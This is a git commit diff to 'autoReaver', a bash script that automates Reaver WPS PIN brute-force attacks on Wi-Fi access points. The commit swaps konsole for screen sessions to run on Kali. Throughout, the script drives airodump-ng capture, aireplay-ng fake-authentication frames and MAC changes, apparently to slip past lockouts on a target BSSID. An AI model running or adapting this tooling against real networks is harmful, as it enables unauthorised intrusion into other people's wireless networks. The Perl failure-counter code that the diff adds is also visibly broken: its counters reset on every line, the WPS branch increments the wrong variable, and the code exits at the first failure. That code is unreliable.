compatible kail linux 1 repair ifconfig dev name : 2 screen replace konsole 3 add reaver perl check rule

diff --git a/autoReaver b/autoReaver
--- a/autoReaver
+++ b/autoReaver
@@ -1,5 +1,5 @@
 #!/bin/bash
-
+set -x
 ### REQUIREMENTS
 #  (If you use Backtrack 5, you probably have all the following)
 # - reaver 1.4 (I didn't try it with previous versions)
@@ -202,7 +202,7 @@ restartMonitor() {
 
 # tries to extract monitor name from the ifconfig output
 getMonitorName(){
-    ifconfig | perl -lane '{ if(/^[^\s]*mon/){ $_ =~ s/\s+.*//; print $_; } }'
+    ifconfig | perl -lane '{ if(/^[^\s]*mon/){ $_ =~ s/:\s+.*//; print $_; } }'
 }
 
 changeMacTo(){
@@ -252,7 +252,8 @@ while true; do
 done
 EOF
 );
-konsole --background-mode --title 'Reaver Activity Checker' -e /bin/sh -c "$TMP_SCRIPT" 2>/dev/null;
+#--background-mode 
+konsole --title 'Reaver Activity Checker' -e /bin/bash -c "$TMP_SCRIPT" 2>/dev/null;
 }
 
 isProcessActive() {
@@ -272,11 +273,11 @@ isValidMac(){
 }
 
 getKonsolePidByProcessName(){
-    ps aux | gawk '!/konsole/ || !/'"$1"'/{ next; } {print $2}';
+    ps aux | gawk '!/SCREEN/ || !/'"$1"'/{ next; } {print $2}';
 }
 
 getNotKonsoleProcessByName(){
-    ps aux | gawk '/konsole/ || !/'"$1"'/{ next; } {print $2}';
+    ps aux | gawk '/SCREEN/ || !/'"$1"'/{ next; } {print $2}';
 }
 
 getPidByProcessName(){
@@ -334,6 +335,7 @@ countAVGSecondsBetweenDates(){
 # checks whether airodump-ng works and scans properly
 # uses globals: TMP_DIR
 isAirodumpWorking(){
+##  local MONITOR_NAME=$(getMonitorName);
   #local CHECK=$(iwlist wlan0 scan | grep "$1");
   if [[ -z $(ifconfig | grep "${MONITOR_NAME}") ]]; then
     restartMonitor &>/dev/null;
@@ -344,8 +346,9 @@ isAirodumpWorking(){
   local TIMEOUT=15;
   # clear old logs
   rm $AIRODUMP_CSV_LOG &>/dev/null;
-  CM="konsole --background-mode --title 'airodump-ng' -e /bin/sh -c 'airodump-ng --output-format csv --write $TMP_LOG ${MONITOR_NAME}' ";
-  eval $CM 2>/dev/null
+  CM="screen -dm airodump-ng --output-format csv --write-interval 2 --write $TMP_LOG ${MONITOR_NAME} ";
+  eval $CM 2>/dev/null &
+  sleep 3
   local LAST_PID=$(getNotKonsoleProcessByName 'airodump-ng');
   local CHECK="";
   while true; do  
@@ -383,6 +386,7 @@ isAirodumpWorking(){
 # it gets timeout from global BSSID_ONLINE_TIMEOUT
 # uses globals: BSSID_ONLINE_TIMEOUT, TMP_DIR
 isAPOnline(){
+  MONITOR_NAME=$(getMonitorName);
   #local CHECK=$(iwlist wlan0 scan | grep "$1");
   if [[ -z $(ifconfig | grep "${MONITOR_NAME}") ]]; then
     restartMonitor &>/dev/null;
@@ -394,8 +398,9 @@ isAPOnline(){
   local BEGIN_TIME=$(date +%s);
   # clear old logs
   rm $AIRODUMP_CSV_LOG &>/dev/null;
-  CM="konsole --background-mode --title 'airodump-ng: $BSSID ($ESSID)' -e /bin/sh -c 'airodump-ng --output-format csv --write $TMP_LOG --bssid=$BSSID --channel=$CHANNEL ${MONITOR_NAME}' ";
-  eval $CM 2>/dev/null
+  CM="screen -dm airodump-ng --output-format csv --write-interval 2 --write $TMP_LOG --bssid=$BSSID --channel=$CHANNEL ${MONITOR_NAME} ";
+  eval $CM 2>/dev/null &
+  sleep 3
   local LAST_PID=$(getNotKonsoleProcessByName 'airodump-ng');
   local CHECK="";
   while true; do  
@@ -431,6 +436,7 @@ isAPOnline(){
 
 # uses globals: BSSID_ONLINE_TIMEOUT, TMP_DIR
 findAPChannel(){
+  MONITOR_NAME=$(getMonitorName);
   if [[ -z $(ifconfig | grep "${MONITOR_NAME}") ]]; then
     restartMonitor &>/dev/null;
   fi
@@ -440,8 +446,9 @@ findAPChannel(){
   local BEGIN_TIME=$(date +%s);
    # clear old logs
   rm $AIRODUMP_CSV_LOG &>/dev/null;
-  CM="konsole --background-mode --title 'airodump-ng: $BSSID ($ESSID)' -e /bin/sh -c 'airodump-ng --output-format csv --write $TMP_LOG --bssid=$BSSID ${MONITOR_NAME}' ";
-  eval $CM 2>/dev/null
+  CM="screen -dm airodump-ng --output-format csv --write-interval 2 --write $TMP_LOG --bssid=$BSSID ${MONITOR_NAME} ";
+  eval $CM 1>/dev/null 2>/dev/null &
+  sleep 3
   local LAST_PID=$(getNotKonsoleProcessByName 'airodump-ng');
   local CHANNEL="";
   while true; do
@@ -506,6 +513,7 @@ stopMonitor;
 resetWifiCard;
 startMonitor;
 MONITOR_NAME=$(getMonitorName);
+export MONITOR_NAME;
 
 
 if [ "$MACCHANGER_ON" == "ONCE" ]; then
@@ -685,12 +693,12 @@ while true; do
       ############# START KONSOLE COMMANDS WITH: REAVER && R.A.C. && AIREPLAY && AIRODUMP
       if [[ $NO_AIRODUMP == 0 ]]; then
 	  # start monitoring BSSID & show blocked WPS in other konsole windows
-	  CM="konsole --background-mode --title 'airodump-ng: $BSSID ($ESSID)' -e /bin/sh -c 'airodump-ng --bssid=$BSSID --channel=$CHANNEL ${MONITOR_NAME}' ";
+	  CM="screen -dm airodump-ng --bssid=$BSSID --channel=$CHANNEL ${MONITOR_NAME}  ";
 	  echoGreen "$CM" && eval $CM 2>/dev/null
       fi
       if [[ $NO_AIREPLAY == 0 ]]; then
 	  # sending fake auth every X sec to keep alive connection and better performance of reaver
-	  CM="konsole --background-mode --title 'Fake authorization aireplay-ng' -e /bin/sh -c 'aireplay-ng -1 $FAKE_AUTH_DELAY_SECONDS -a $BSSID -c $BSSID ${MONITOR_NAME}' ";
+	  CM="screen -dm aireplay-ng -1 $FAKE_AUTH_DELAY_SECONDS -a $BSSID -c $BSSID ${MONITOR_NAME}  ";
 	  echoGreen "$CM" && eval $CM 2>/dev/null
       fi
       # there are only 3 attempts from 1 MAC
@@ -700,6 +708,9 @@ while true; do
       # and kills reaver process so loop can continue
       echoGreen "$COMMAND" && eval $COMMAND \
        | perl -lane '
+	  # Failed counter
+	  $failed_cnt=0;
+	  $WPS_transaction_failed=0;
 	  # write current date (seconds since epoch) to file if PIN was checked
 	  if(/'$REAVER_CHECKED_PIN_PERL_REGEXP'/){
 	      system("echo \$(date +%s) >> '$BSSID_LAST_PIN_DATE_FILE'");
@@ -734,6 +745,30 @@ while true; do
 	      print FILE $_;
 	      close FILE;
 	  }
+	  # check Failed
+	  if (/Failed to associate with/){
+	      if($failed_cnt>3){
+     	      # sending -INT signal acts like CTRL + C shortcut
+	          system("killall -INT reaver"); 
+          }
+		  else{
+		      $failed_cnt+=1;
+    	      print $_,"\n[+] Failed to associate with >5"; 
+	          exit 1; 
+		  }
+	  }
+	  if (/WPS transaction failed/){
+	      if($WPS_transaction_failed>20){
+     	      # sending -INT signal acts like CTRL + C shortcut
+	          system("killall -INT reaver"); 
+          }
+		  else{
+		      $failed_cnt+=1;
+    	      print $_,"\n[+] WPS_transaction_failed >20"; 
+	          exit 1; 
+		  }
+	  }
+	  
 	  print $_;
       ';
       # kill old konsole windows (if they persist)
